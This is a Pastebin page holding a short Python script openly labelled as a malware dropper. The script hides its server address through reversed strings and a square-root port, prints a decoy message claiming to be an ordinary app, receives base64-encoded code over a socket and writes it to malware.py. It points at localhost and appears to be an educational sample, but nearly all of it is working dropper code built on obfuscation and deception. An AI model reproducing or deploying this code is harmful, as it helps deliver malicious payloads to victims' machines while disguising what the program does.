API tools faq
paste
FlyFar

dropper/dropper.py

FlyFar
Oct 19th, 2023
137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.68 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python3
  2.  
  3. """ Implementation of dropper that downloads malicious code from the server
  4.    and dumps it into a file.
  5. """
  6.  
  7. import base64
  8. import logging
  9. import socket
  10. import math
  11.  
  12.  
  13. class Dropper:
  14.     """ This class represents the implementation of dropper.
  15.    """
  16.  
  17.     def __init__(self, host1, host2, number):
  18.         # Construct hostname of the remote server from the first two
  19.         # arguments.
  20.         self._host = self.decode_hostname(host1, host2)
  21.         # Calculate the port number from the last argument.
  22.         self._port = self.decode_port(number)
  23.         # Initialize socket for the connection.
  24.         self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  25.  
  26.     @property
  27.     def host(self):
  28.         """ Server that sends us the malicious code. """
  29.         return self._host
  30.  
  31.     @host.setter
  32.     def host(self, new_host):
  33.         self._host = new_host
  34.  
  35.     def decode_hostname(self, str1, str2):
  36.         """ Returns hostname of the remote server. """
  37.         return str2[::-1] + str1[::-1]
  38.  
  39.     @property
  40.     def port(self):
  41.         """ Port, on which the server runs (`int`). """
  42.         return self._port
  43.  
  44.     @port.setter
  45.     def port(self, new_port):
  46.         self._port = new_port
  47.  
  48.     def decode_port(self, port):
  49.         """Returns target port of the remote server. """
  50.         return int(math.sqrt(port))
  51.  
  52.     @property
  53.     def socket(self):
  54.         """ Client socket. """
  55.         return self._socket
  56.  
  57.     def dump_data(self, data):
  58.         """ Write the retrieved data from the server into the file.
  59.        """
  60.         with open('malware.py', 'wb') as file:
  61.             file.write(data)
  62.  
  63.     def download_malicious_code(self):
  64.         """ Download malicious code from the server. """
  65.         # Create a connection to the server.
  66.         try:
  67.             self.socket.connect((self.host, self.port))
  68.         except socket.error:
  69.             logging.debug('Dropper could not connect to the server.')
  70.             return
  71.  
  72.         # Try to act as an ordinary application.
  73.         print(
  74.             'Hello, this is a totally ordinary app. '
  75.             'I\'m surely not doing anything malicous'
  76.         )
  77.  
  78.         # Receive the malicious code in the encrypted form.
  79.         command = self.socket.recv(1000)
  80.         # Decode the command and dump it into a file.
  81.         decode_payload = base64.b64decode(command)
  82.         self.dump_data(decode_payload)
  83.  
  84.  
  85. if __name__ == '__main__':
  86.     logging.basicConfig(level=logging.DEBUG)
  87.  
  88.     # Initialize dropper application.
  89.     dropper = Dropper('tsoh', 'lacol', 729000000)
  90.     # Collect the malicious code and dump it into the file.
  91.     dropper.download_malicious_code()
Tags: dropper
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!